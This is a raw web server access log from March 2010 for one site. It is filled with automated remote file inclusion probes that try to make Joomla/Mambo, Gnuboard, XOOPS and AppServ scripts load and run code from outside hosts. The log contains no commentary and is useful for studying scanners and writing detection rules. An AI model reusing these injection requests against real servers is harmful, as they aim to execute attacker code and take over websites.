77.92.143.92 - - [01/Mar/2010:09:10:45 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:10:51 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:10:51 -0800] "GET /logs//login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:10:51 -0800] "GET /login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:10:53 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:11:32 -0800] "GET ///delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:09:11:41 -0800] "GET /logs/access_100210.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:09:11:53 -0800] "GET /logs/access_100202.log%20%20//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:12:56 -0800] "GET /logs/access_100205.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:13:06 -0800] "GET /logs/access_100203.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:14:35 -0800] "GET /logs/access_100205.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:14:39 -0800] "GET /logs/access_100203.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:14:41 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:14:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:14:41 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:14:45 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:03 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:03 -0800] "GET /logs/access_100128.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:03 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:05 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:18 -0800] "GET /logs/access_100128.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:18 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:18 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:32 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:32 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:32 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:45 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:46 -0800] "GET /logs/access_100206.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:15:52 -0800] "GET /logs/access_100206.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:15:53 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:15:53 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:15:53 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:02 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:02 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:02 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:03 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:03 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:03 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:52 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:52 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:16:54 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:16:56 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:16:56 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:16:56 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:09:17:37 -0800] "GET /logs/access_100210.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:18:01 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:18:01 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:18:01 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:18:20 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:18:21 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:18:21 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:09:18:22 -0800] "GET /logs/access_100123.log///index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:09:18:22 -0800] "GET /logs///index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:09:18:22 -0800] "GET //index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:18:32 -0800] "GET /logs/access_100205.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:18:36 -0800] "GET /logs/access_100203.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [01/Mar/2010:09:19:05 -0800] "GET /ideal/forum/viewtopic.php?p=17669 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:19:16 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.108.64.216 - - [01/Mar/2010:09:19:32 -0800] "GET /logs/access_100205.log//errors.php?error=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.64.216 - - [01/Mar/2010:09:19:32 -0800] "GET /errors.php?error=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.64.216 - - [01/Mar/2010:09:19:33 -0800] "GET /logs//errors.php?error=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:20:21 -0800] "GET /logs/access_100118.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:20:21 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:20:21 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:09:20:21 -0800] "GET /logs/access_100208.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:09:20:21 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:09:20:21 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:09:20:25 -0800] "GET /logs/access_100218.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:09:20:33 -0800] "GET /logs/access_100203.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:09:20:37 -0800] "GET /logs/access_100217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:09:20:47 -0800] "GET /logs/access_100207.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:09:20:49 -0800] "GET /logs/access_100223.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:09:20:51 -0800] "GET /logs/access_100130.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:20:52 -0800] "GET /logs/access_100210.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:20:58 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:07 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:09 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:09 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:09 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:22 -0800] "GET /logs/access_100123.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:23 -0800] "GET /logs/access_100123.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:37 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:37 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:37 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:21:52 -0800] "GET /logs/access_100123.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:04 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:04 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:05 -0800] "GET /logs/access_100203.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:21 -0800] "GET /logs/access_100123.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:21 -0800] "GET /logs////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:22:21 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:21 -0800] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:22:22 -0800] "GET /logs/access_100128.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:22:22 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:31 -0800] "GET /logs////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:32 -0800] "GET /logs/access_100123.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:22:34 -0800] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:22:43 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:22:51 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:22:54 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:23:18 -0800] "GET /logs/access_100211.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:23:33 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:23:34 -0800] "GET /logs/access_100205.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:23:34 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:23:35 -0800] "GET /logs/access_100211.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:23:50 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:23:50 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:23:50 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:23:50 -0800] "GET /logs/access_100206.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:24:13 -0800] "GET /logs/access_100203.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:24:41 -0800] "GET /logs/access_100221.log%20%20////write_comment_update.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:24:41 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
